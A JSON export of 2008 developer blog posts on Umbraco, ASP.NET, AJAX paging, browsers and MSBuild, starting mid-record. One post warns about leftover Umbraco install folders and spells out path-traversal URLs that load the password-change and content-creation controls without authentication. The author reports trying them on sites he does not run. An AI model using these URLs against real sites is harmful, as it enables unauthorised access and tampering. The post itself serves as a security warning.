to an XDocument object and save! There you have it, how to create an Excel document using LINQ to XML and C#. Source code can be found here. ", "id": "2008-09-16-linq-to-xml-to-excel" }, { "title": "Did you forget something in your Umbraco site?", "url": "https://www.aaron-powell.com/posts/2008-09-15-did-you-forget-something-in-your-umbraco-site/", "date": "Mon, 15 Sep 2008 00:00:00 +0000", "tags": [ "umbraco" ], "description": "", "content": " When deploying Umbraco into a new environment (a UAT, a production, etc) everyone has a check list that the tick off against. This will cover items like: Modifying the web.config to use the right connection string/ smtp/ etc Setting the permissions on the file system Remove the Install folder And so on  Remove the Install folder, huh? To be honest this is a step I often forget, the Install folder tends to float around like a bad smell simply cuz no one has gotten around to removing it, but it can't be that bad... can it? Well yes, yes it can. First off, anyone clued in enough can get to your site and then go to /install/Default.aspx and run through the installer! Yeah, I'm sure you want that done...\nOr if you've got a really mallicious person they can start playing around with the installStep query string parameter. The installStep query string parameter has this really nice feature, you provide it the path to an ASCX so it can load that into the installer. The idea is so you can quickly jump to the appropriate step, the down side is it allows you to jump to any ASCX on the site.\nJust for fun try this on your site:\n/install/Default.aspx?installStep=../../umbraco/controls/passwordChange Well that just aint right now is it... So I decided to see what else you can do, well for starters you've got:\n/install/Default.aspx?installStep=../../umbraco/create/content See where I'm going with this, yep, you can bring up the create content window! Now we're getting dangerous.\nIf you've been like a lot of lazy dev's and not set up a 500-error page you'll see a lovely yellow error with a stack trace showing you just why the parse failed, looks like we missed a query string parameter.\nAnyone with access to the Umbraco source code (it's open source, so that's like... everyone) can then work out what went wrong, turns out we need a query strong nodeId, so lets try again:\n/install/Default.aspx?installStep=../../umbraco/create/content&nodeId=<some node id> Well what do you know, I can create a page... Obviously a random hacker will be slowed down by the fact that you need to actually know a node ID, but that's not hard to work out, trial and error will get you there eventually. I tried this on a handful of Umbraco sites I know of (including some very high profile companies sites) and found this working on all but 1 of them.   Moral of the story? Delete the bloody Install folder before going live! ", "id": "2008-09-15-did-you-forget-something-in-your-umbraco-site" }, { "title": "Not so tasty cookies", "url": "https://www.aaron-powell.com/posts/2008-09-11-not-so-tasty-cookies/", "date": "Thu, 11 Sep 2008 00:00:00 +0000", "tags": [ "asp.net", "generic .net", "rant" ], "description": "", "content": " As a general rule I'll avoid web cookies, they've got a bad wrap, and are too often used and abused. But for storing long life information on a client there's not really anything better. So recently I was putting them into a site which would check when you first hit it if the cookie exists, if it didn't then create it. Having not used cookies for a while I'd lost touch with how they operate, especially in the ASP.NET collection. Since HttpCookieCollection is a named collection you'd think that you could just got: HttpCookie myCookie = Response.Cookies[\"myCookie\"]; Well you can... sort of, I'll get to the sort of shortly, but some background.\nEvery time I did this I ended up with a cookie, regardless of whether one already existed or not. If it didn't exist then it'd have an expiry equal to DateTime.MinDate. Fine, what ever, I can detect that, so I had a handler to check that condition as well as a null return in myCookie. Then I have the following lines: HttpCookie myRealCookie = new HttpCookie(\"myCookie\");\nmyRealCookie.Value = \"something\";\nmyRealCookie.Expiry = DateTime.Now.AddDays(1);\nResponse.Cookies.Add(myRealCookie); But when I hit the control that is to use the cookie I get back the first \"dud\" cookie. WTF?\nSo I look at the HttpCookieCollection, low-and-behold I have 2 cookies named \"myCookie\". And when I try and get one out I always get the dud cookie.\nWTF! So I fire up Reflector and look squarly at what happens and this is what I found: public HttpCookie this[string name]{ get { return this.Get(name); } }public HttpCookie Get(string name){ HttpCookie cookie = (HttpCookie) base.BaseGet(name); if ((cookie == null) && (this._response != null)) { cookie = new HttpCookie(name); this.AddCookie(cookie, true); this._response.OnCookieAdd(cookie); } return cookie; }\tOh you have to be kidding me. You'd think that when I try and get a cookie that may not exist it doesn't just add the frigging thing! So then I had to implement a lovely work around to itterate through the collection, check them by their index.\nHello performance! Yes, this is just another lovely example of the .NET framework thinking we're too dumb to handle coding ourselves. ", "id": "2008-09-11-not-so-tasty-cookies" }, { "title": "The SharePoint community is in morning", "url": "https://www.aaron-powell.com/posts/2009-09-05-the-sharepoint-community-is-in-morning/", "date": "Fri, 05 Sep 2008 00:00:00 +0000", "tags": [ "sharepoint" ], "description": "", "content": " So I've just sat down to read over the pilling up blogs from the last few days when I came across this one from Karine Bosch. Patrick Tisseghem passed away earlier today. Anyone who's not familiar with his name will most likely be familiar with his work through U2U, blogs, articles, books and training courses. I was lucky enough to have met Patrick last year at a 5 day SharePoint training session, it was a good great course, despite the disaster with the training material not arriving nor the books being available at the time. I have a copy of his first MOSS 2007 book, Inside Microsoft Office SharePoint Server 2007 and his second book Inside the Index and Search Engines: Microsoft Office SharePoint Server 2007, sounds interesting as I find the search engine in SharePoint such a pain to get my head around. His sudden death is a tragic loss to the SharePoint community and I wish the best for his family and friends in this troubled times. Farewell Patrick, I'm glad to have had the chance to meet you. ", "id": "2009-09-05-the-sharepoint-community-is-in-morning" }, { "title": "Does the world need another browser?", "url": "https://www.aaron-powell.com/posts/2008-09-03-does-the-world-need-another-browser/", "date": "Wed, 03 Sep 2008 00:00:00 +0000", "tags": [ "chrome" ], "description": "", "content": " So today Google released their foray into the web browser market with Google Chrome and I'm sitting here wondering does the world really need another browser? Lets look at the big players in the browser market: Internet Explorer Mozilla FireFox Apple's Safari Opera\nThen there's piles of smaller market share browsers (which argueably Opera and Safari fall into the category of). Each browser offers its own pros and cons. IE has the largest market share dispite some poor showing in the past. IE 6 is one of the worst things that happened to the web in recent years. But IE 7 isn't a bad browser, it's my primary browser in Windows, mainly because it has brought in the features from other browsers and it is very fast under Windows.\nIE 8 is shaping up to be a very nice contender, with Beta 2 recently coming available there's some very nice features, tab crash recovery, address bar highlighting, etc. There's lot of other blogs covering its features. FireFox has the enthusiest market down pat, with it being the number 1 Open Source choice. FireFox is great with its add-in engine, giving people the ability to customise it to their liking.\nAnd then there's FireBug argueably the number one inovation in the world of web development. I'm hard pressed to find a day which I don't use FireBug. But FireFox isn't without its critics, I for one am not a huge fan of it. I find it a real pain in the arse that every time I set up a new computer I have to go out and reconfigure FireFox for my personal settings, then there's the argument of memory usage. Safari is Apple's IE, it hasn't had quite as ugly a past, but it is far from perfect. Like IE in Windows Safari is super fast under OS X thanks to Apple pre-caching the browser.\nMy biggest grip about Safari under OS X is how tied to the browser is to it. I can only use Safari 3 under OS X 10.5, I can't use any previous version, and thanks to Apple's license dispute with VM's it makes it very hard to test multiple versions. Something really useful as a web developer! Last of the larger players is Opera, the browser for all devices, from mobile to Wii. I'm a big fan of Opera, I've used it for a very long time (since around v5) and I've always found it innovative in the market. From mouse gestures to a download manager to in-built torrent engine.\nBut it's not without issues, it's quite common to find problems with a site (eg, the Umbraco editor UI doesn't work with it), most commonly to do with how JavaScript is handled. So where does all of this leave Chrome? One of the most interesting things about the first release of Chrome is the fact that it's a Windows-only release. Interesting because it uses WebKit as it's base, which is what Safari is built off, and a fork of KHTML (and related KDE projects), so it's base is cross-platform by nature.\nMost people aren't going to give a shit about this app, it's more the techy market that's going to have a look, have a play and decide if they will be back, so why ignore a large portion by only releasing to Windows? I'll admit to not having had a huge play with it but I did install it, have a bit of a browse with it and then had to get back to the daily grind.\nAnd it left me going \"yeah so what?\". People are saying that it's blindingly fast, but I didn't notice any speed differences between it, IE 7 and FF 3.x on Vista x32. One of the big marketing points is that each tab runs in its own process. Now this is nice and does mean that if one crashes you don't loose it all. IE 8 also has this, but without running separate processes.\nI'm a little weary on each being in their own process. I'll often have a lot of tabs opened, each with their own process, so there's a lot more processes fighting for CPU time. Sure not really a problem in a multi-core environment but I've often got a lot going on on my CPU already (compilation, file copy, SQL server, web server, etc) so more fighting is always something to be weary of. Also, I didn't really see any feature to grab my attention. The address bar doubles as a search, but what browser does it not?! Can I change search provider though, now that's an interesting question (and one I'll have to look into!)? The new tab window looks a lot like Speed Dial in Opera 9, the UI is very WebKit/ Safari in its look and there's the obligatory FireBug clone. So does the world need another browser? In my opinion Chrome brings nothing we haven't seen before to the table, it looks a lot like a \"me too!\" release. I already have IE to address my large company pushed browser, FireFox for my obsessive need to tweak and Opera for my daily useage.\nChrome is just another anoyance, another chance for people to find start a fan club over, and another bloody browser to test against. ", "id": "2008-09-03-does-the-world-need-another-browser" }, { "title": "Umbraco Membership Trap", "url": "https://www.aaron-powell.com/posts/2008-09-02-umbraco-membership-trap/", "date": "Tue, 02 Sep 2008 00:00:00 +0000", "tags": [ "umbraco", "asp.net" ], "description": "", "content": " So today I was working to fix a problem on a site of ours which was to do with logging out of a site which uses the Umbraco Membership as the authentication provider.\nThe bug was that when you had to click the logout button twice to log out. Clicking logout once would just refresh the page with nothing apparently happening. Firing up the debugger I start have a look, making sure that the events are being fired when they should and so on... and they are. The logout method is called, the member is removed from the cache, the \"show login\" method is called, but if you check through the Umbraco API you're not logged out. Member.CurrentMemberId() still returned a value. Hmm... so I'm doing everything that I need to do, so why is the member still logged in?\nI pull our .NET Reflector and start having a poke around the API calls. For those who don't know, by default Umbraco stores the member login details in cookies, and that was running fine, but what I found interesting was that when I call the Member.ClearMemberFromClient method the cookies still existed! That's not right... so I check out what's happening, when I notice the problem: Do you see it? If not I'll point out the problem. The cookie is not removed from the HttpContext, it is mearly set to expire immidiately. Well, at least once the context has disposed. So the only way we can get around this is to redirect after clearing the member from the client cache. ", "id": "2008-09-02-umbraco-membership-trap" }, { "title": "Optimising UpdatePanels", "url": "https://www.aaron-powell.com/posts/2008-08-28-optimising-updatepanels/", "date": "Thu, 28 Aug 2008 00:00:00 +0000", "tags": [ "asp.net", "ajax" ], "description": "", "content": " So it can be generally agreed that UpdatePanels are evil. Plenty of people have blogged about this, there's a good post here which goes over it in more details. To give a brief background the reason they are not a great idea is because of what they are, just a wrapper for the standard PostBack request to force it via XHttp rather than normal. This results in more data being submitted and returned than is really needed, so on big pages, or big requests this can negate the point of using AJAX as you're still submitting a lot of data. But there are instances where an UpdatePanel can be a viable choice, these are generally based around paged data. I came across this the other day when taking an implemented ListView control and wanting to make it paged and AJAX-y. So an UpdatePanel was in order. Lets have a look at a basic implementation of an UpdatePanel for a paged solution. The back end First off we're going to need a data source to display in our UpdatePanel. I've created a simple collection of people: I'm going to be implementing this in an ASP.NET ListView control, which will be paged. So here's the ASPX: And we're going to get the resulting page like this: Inspecting the response So lets look at what we're transfering back and forth on the server. I'll be using the FireBug plugin for FireFox to look at the request/ response but Http Fiddler would work just as well if you're an IE person. First we hit the page (Click for larger version) That's not exactly what we want to see. Sure it's not a big amount but 62kb is a lot to have received for such a small page. Now lets go to the next page of the data and get the UpdatePanel to do some work. Again, that's not exactly appealing, 4kb just to get another 5 rows!? It's also worrying when we look at the time taken Ouch, 2 seconds is a long time for such a small amount of data... But why is this happening? Well lets inspect the response with FireBug (Click for larger version) Now it starts to make sense, we're get a large, well formatted code block back. Now I am a huge fan of formatting documents. There's nothing worse that looking at a big code slab, I'm forever hitting Ctrl + K + Ctrl + D to reformat my document, but in this case it's having a very negative effect on our pages performance. Optimising the requests So now we've seen our simple little demo in action, the submit is a little heavy, even for what you'd like on an UpdatePanel, is there anything we can do about it? Well there's several things we can do, as you may notice from the screen shot we are submitting and receiving the ViewState each time. This is the major problem with an UpdatePanel, especially on complex pages. So the first thing is to turn off ViewState on anything you don't need it on. Eg - Label controls, the overhead of submitting their ViewState is higher than that of repopulating the attributes during a postback (and if you're properly AJAX-ing the page, you may not even need to do that as the PostBack isn't ever done!). But what else? Well, looking at the response there is a lot, and I mean a lot of whitespace, this adds considerable weight during submits. So what if we were to remove it? Say I changed my ASPX to look like this Sure, it's not overly readable, but how does it perform on the inital page load Hmm... down 1kb! How about the UpdatePanel request? Down a few more kb, but was it faster? Yes it was. Keep in mind that the time is a little subjective as I'm running this on my laptop so it can have performance fluctations, but none the less you should notice a decrease in the request time. And what does our response look like? (Click for larger version) Hmm... not really readable, but are we after readability... Conclusion So my example may be some-what sanitised, we don't really have a complex page, there not much in the way of other controls bar the UpdatePanel so the ViewState isn't really coming into effect in request weight. But this should give you an idea on if an UpdatePanel is the option you're going with then here is a few tricks to make it a bit less unpleasent. But that's not all, shortly we'll look at achieving this without the need to an UpdatePanel, or even ASP.NET controls! ", "id": "2008-08-28-optimising-updatepanels" }, { "title": "Paging data client side", "url": "https://www.aaron-powell.com/posts/2008-08-28-paging-data-client-side/", "date": "Thu, 28 Aug 2008 00:00:00 +0000", "tags": [ "ajax" ], "description": "", "content": " So in my last post I looked at how to use an UpdatePanel to do data paging and then optimising the HTML to get the best performance from our requests, but it still wasn't optimal. Although we can optimise the UpdatePanel response we can't do much about the request, and especially with regards to the ViewState within a page, which is the real killer.\nThis is when we turn to doing client-side paging using client-side templates. This concept is basically the same as what we're familiar with for the ListView and Repeater ASP.NET controls, but they operate entirely in JavaScript using JSON object collections. There's plenty of ways to go about client-side templating, you can write your own templating engine, it's not hard, I had a crack at it and wrote a client-side repeater which consumed data from a webservice in only a few hours.\nOr you can use any of the premade template engines. I'm a fan of the jQuery plugin, jTemplates or you can use the templating engine which is part of Preview 1 of the Microsoft AJAX 4.0 library. Lets have a look at both. Setting up the WebSerivce Well the first thing we need is to be able to get the data, so we'll create some webservices and set them up for JSON transmission on the data. You'll notice there's 2 services, one for the returning of the People collection in a paged format, thanks to some lovely LINQ extensions, and one to get the total number in the collection (which we'll look at later). Using jTemplates Now we need to set up our client side template, jTemplates has its own expression format which is very similar to using an ASP.NET repeater, and it has lots of really nice inbuilt features for executing more functions when the template is being executed. I'm only going to be using a very basic features of jTemplates. Here's the template I've created for the example: (Click for larger version) So theres our template, now we need to implement it. We'll use jQuery to do our AJAX requests on the initial page load, and then all subsiquent requests: I've got a few global variables which will be used in the various locations within the JavaScript to maintain our page position. The getPeople method will handle the AJAX request and then I have a separate load method in the form of loadPeople. getPeople will be used when ever we want to refresh the pages data. When doing the AJAX request we need to pass in parameters the webservice requires. It's best to check out the jQuery documentation for how the various properties on the $.ajax function operates.\nThe loadPeople is where we actually create the client template instance and load the data into it. Yes, it's that simple to create a client template. Because the result is in JSON we don't need to worry about any kind of conversion. Now we have the client template displaying the data we need to have to work on the paging. First we need to know how many pages to make, so it's time to use the GetPeopleCount webservice The loadPaging method is used to output our result and then the paging itself is set up. I've also got a few methods which are then used for the next and previous buttons: Just to make it a bit cleaner I'm also disabling the buttons when they are not required. Well now that this is all set up, how does it perform? Well I'll just let the pictures do the talking (Click for larger version) I'm sure you can deduce from the above that it was much more efficient. We've got a much smaller page load, and then the request is only a fraction of what the UpdatePanel one is! And we don't have the problem of submitting the ViewState either! Microsoft AJAX 4.0 Preview 1 So I'll just look at this briefly, first off we need to define our template: (Click for larger version) I really like this template engine of jTemplates, it's much simpler (but evidently less powerful) to implement, there's no really wierd syntax needing to be remembered. The only wierdness is that the template much be a class named sys-template so the engine knows to now display it. As can be seen above the JavaScript is also fairly easy to work with. In the Microsoft AJAX format you define the control then use a pesudo-accessor to add the data and then invoking a render.\nVery much like a .NET DataBinder control. I wont bother showing the request/ response info as they are virtually identical to what was seen in the jTemplates example. Conclusion So now all our paging needs should be statisfied. We've seen standard UpdatePanel implementations, then made them as optimised as possible. And to finish it off we looked at doing it using JavaScript entirely (well, for display purposes it's entirely done :P). Hopefully this is gives a useful insight into the world beyond ASP.NET. And to wrap it all up here's the sample project to play with yourself. ", "id": "2008-08-28-paging-data-client-side" }, { "title": "Mac is dead again", "url": "https://www.aaron-powell.com/posts/2008-08-21-mac-is-dead-again/", "date": "Thu, 21 Aug 2008 00:00:00 +0000", "tags": [ "mac" ], "description": "", "content": " Well again my MBP is back to the repairer, I've been having intermitent issues with the keyboard and mouse since it last was repaired (on an unrelated matter) and finally I'd had enough. I took it down to the local Mac dealer and handed it over, to be told I'd be without it for around 10 days :( It's going to be a long 10 days, that's for sure... ", "id": "2008-08-21-mac-is-dead-again" }, { "title": "*Preview* - Umbraco interaction layer", "url": "https://www.aaron-powell.com/posts/2008-08-13-preview-umbraco-interaction-layer/", "date": "Wed, 13 Aug 2008 00:00:00 +0000", "tags": [ "umbraco" ], "description": "", "content": " So I've been doing more and more work with the Umbraco API of recent (particularly in regards to my website) but I'm getting more and more frustrated at the interaction which occurs at an API level (not to mention that it's rather ugly in some places). When you're working with documents which are using extended document types (and how often will Id and Text be enough data?). You're constantly populating code with getProperty(alias) and performing null checks, default data handling, etc. This is why I wrote the Umbraco Member class, as members are the one thing that is most commonly interacted with from a code level. So to make it easier to interact with Umbraco documents at a code level I have a preview of the Umbraco Interaction Layer. The what? This project aims to create a code generator for Umbraco document types. It aims to take the complexity out of interacting with the Umbraco API.\nAnother goal is to bring Umbraco closer to a viable choice as a data storage mechanisum, not just a CMS. Most projects I have worked across have had some form of Data content tree which contains content which is non-navigatable, just CMS manageable, such as people profiles, news articles or photo gallery items. Quite frequently interacting with this Data content structure is done via .NET and via the Umbraco API. So having an easier way to interact with an actual representation of my document types at a code level would be a whole lot nicer. Preview At the moment I'm still in early stages of development, but I thought it'd be nice to share. Lets say I have the following document type (it's actually one from my site and used in my Data content tree :P): Well now I can generate some lovely .NET code, say C#? Or maybe you're a VB person?\nWell you can join in too! You may notice all properties decorated with an UmbracoInfo attribute, well that will be used to provide feedback about how the object relates back to it's Umbraco instace. Well there we have it, a nice little tease of things to come ;) ", "id": "2008-08-13-preview-umbraco-interaction-layer" }, { "title": "ASP.NET Virtual Earth control", "url": "https://www.aaron-powell.com/posts/2008-08-13-aspnet-virtualearth-control/", "date": "Wed, 13 Aug 2008 00:00:00 +0000", "tags": [ "ajax", "asp.net" ], "description": "", "content": " So I was going through my blog feeds the other and came across a post about the CTP release of an ASP.NET Virtual Earth server control (Channel9 video here). I'm doing quite a bit of work with Google Maps at the moment so I was interested in seeing what was available in this Microsoft incarnation. Well to be honest I was really quite dissapointed in the attitude of the people doing this, in regards to what an ASP.NET developer should be capable of knowing/ doing. Essentially the control is an ASP.NET server control you put into your page and can program against using C# directly, rather than having to interact through JavaScript. Great idea in theory, poor idea in practice.\nThe video goes on then to show how \"cool\" it is to integrate with the UpdatePanel to \"completely remove the need to code JavaScript\". Sorry... what? There was also some comment along the lines that ASP.NET dev's don't have the time to do JavaScript.\nAgain... what? I don't believe any good ASP.NET developer, or any web developer for that matter, can survive without having knowledge of JavaScript. For making rich web UI's it can't be beaten (unless you're going down the flash/ silverlight path, but then they aren't entirely web UI's). Another thing was a glimse of the source of the page and a quick scroll past the ViewState, which was... large.\nCombine a large ViewState with an UpdatePanel as they do any you're into a world of poor performance. Kudos to Microsoft for triyng to make Virtual Earth more accessible to web developers, but poor form in thinking that an ASP.NET server control is the best way to go about it. ", "id": "2008-08-13-aspnet-virtualearth-control" }, { "title": "AaronPowell.MSBuild.Tasks v0.2", "url": "https://www.aaron-powell.com/posts/2008-08-09-aaronpowell-msbuild-tasks-v02/", "date": "Sat, 09 Aug 2008 00:00:00 +0000", "tags": [ "MSBuild" ], "description": "", "content": " Ok, well it's actually v0.2.3143.41238 but who's counting :stuck_out_tongue: So I've got a new version of my MSBuild tasks ready, and in this new minor release I added a new namespace and two new tasks. The new namespace is AaronPowell.MSBuild.Tasks.Sql and the new tasks are DatabaseBackup and DatabaseRestore.\nI'm sure you're smart enough to work out what these two tasks do, but for those who are a little slow to catch on. DatabaseBackup This task is designed to make it easier to backup a database as part of a build. It generates a Sql command, adds the appropriate parameters and then runs it nicely.\nYou can specify any location and filename to backup to, provided the Sql Server is able to connect to it to run the backup. Note - it only supports MS SQL servers and full database backups. The above shows how to use the MSBuild task in use. DatabaseRestore This task is designed to restore a database from a backup, it is slightly more advanced as it requires a few more parameters, such as where to find the log and data files of the database (full path on the Sql server).   With the above example there are two parameters left out, if the name within the data/ log files within the backup these can be provided within the DataName and LogName properties.   So there we go, two pretty new tasks. Get v0.2.3143.41238 now! ", "id": "2008-08-09-aaronpowell-msbuild-tasks-v02" }, { "title": "Extending Umbraco Members", "url": "https://www.aaron-powell.com/posts/2008-08-07-extending-umbraco-members/", "date": "Thu, 07 Aug 2008 00:00:00 +0000", "tags": [ "umbraco" ], "description": "", "content": " Recently we've had several projects which have come through in which we are building a solution in Umbraco and the client wants to have memberships within the site. Umbraco 3.x has a fairly neat membership system but it's a bit limited when you want to interact with the member at a code level. Because members are just specialised nodes they can quite easily have custom properties put against them, but reading them in your code is less than appealing.\nYou've got to make sure you're reading from the correct alias, typing checking, null checking, etc. And as I kept finding I was writing the same code over and over again for the reading and writing to the properties I thought I'd put together a small framework class. The framework requires the following Umbraco DLL's: businesslogic.dll cms.dll\nSo lets look at some sections of the class. Default Properties A member has a few default properties which are also built into the framework. There are also a few additional properties which the framework uses (such as the MembershipTypeId) which are coded in. All of the default properties are virtual so they can be overriden if so desired.  An interesting addition I have made is the IsDirty property. This is used later on during the Save to ensure that only members who have actually got data changed are saved back into Umbraco. This limits database hits and improves performance. Constructors I've found that there are 3 really useful constructors, a new member constructor and two existing member constructors. What you'll notice from this is that the constructor which takes an Umbraco member is actually marked as private. This is because the framework is targetted at multi-teired applications, like MVC/ MVP where you want to keep data layers separate from the others. And by doing this you can avoid having the Umbraco DLL's included in any other project in your solution. Next you'll notice a call to the method PopulateCustomProperties, this is an abstract method which you need to implement yourself to populate your own properties on a membership object. Saving Obviously this is an important aspect, and by default the framework already has the saving of the default properties configured. This is also an abstract method called PrepareMemberForSaving which can be used for preparing an Umbraco membership object for saving to the database. Notice the use of the IsDirty flag to ensure we're only saving what we should save. Helper Methods I've provided a few helper methods which can be used for the reading and writing of custom properties on the Umbraco membership object. The two get methods handle the null and default data checking, along with casting back to the appriate data type. Here's an example implementation: The save is really just a shortcut, I was sick of typing out that same command every time, to use it you would call it from the PrepareMemberForSaving method like so:   And we're done So there you have it, a simple little class for creating a .NET implementation of an Umbraco member. There are two downloads available, Member.cs or a compiled DLL. It will be interesting though when Umbraco 4 ships and the membership model changes to use the ASP.NET membership providers... ", "id": "2008-08-07-extending-umbraco-members" }, { "title": "Unit Testing LINQ to SQL", "url": "https://www.aaron-powell.com/posts/2008-06-10-unit-testing-linq-to-sql/", "date": "Tue, 10 Jun 2008 00:00:00 +0000", "tags": [ "unit testing", "linq to sql" ], "description": "", "content": " Unit testing is a vital role of development these days, and with recent development within the .NET framework and the Visual Studio system it is easier than ever to create unit tests. One pain point with unit testing a database-driven application is always the state of the database prior to the tests and after the tests. You have to make a call as to whether you have a separate database which you run your tests against or use your primary database and potentially fill it with junk results all the time. I'm fairly familiar with the DataContext in LINQ to SQL, but as with all things there's always more to learn about, which a friend of mine pointed out to me the other day. More than just a connection The DataContext is more than just a connection manager for your database, it also contains information about your database and schema, let me introduce two neglected methods of the DataContext: context.DatabaseExists() context.CreateDatabase() Because a DBML file has the full schema (will, full known schema) your DataContext will know whether or not your database specified in your connection string actually exists, and you can create it yourself if needed. This is where unit testing comes in. Oh, and there is one other method which can be used as well if you want to do complete clean up: context.DeleteDatabase() So... unit testing? With unit testing you often don't care about the data created during the test, provided that all your Asserts are successful you can just delete it all when your done, but you'll want to make sure that your CRUD is working so you need somewhere to write to, this is when we can pull out te CreateDatabase() method. Another idea which can be coupled with this is randomly-generated databases purely used for the test execusion. Here's a sample test method I've got: [TestMethod] public void DatabaseTesting() {   string connstring = \"Data Source=apowell-vm-vist;Initial Catalog=TestDriven_\" + new Random().Next() + \";Integrated Security=True\"; using (TDDDataContext ctx = new TDDDataContext(connstring)) { if (ctx.DatabaseExists()) { ctx.CleanDatabase(); } else { ctx.CreateDatabase(); } } } Oh - CleanDatabase() is an extension method I wrote just as an example, but you could do some Asserts to ensure the lookup data is already in there. As you can see from the example I'm randomly creating a database name, and creating it if it exists. So there you have it, simply creating test databases with LINQ to SQL :D ", "id": "2008-06-10-unit-testing-linq-to-sql" } ]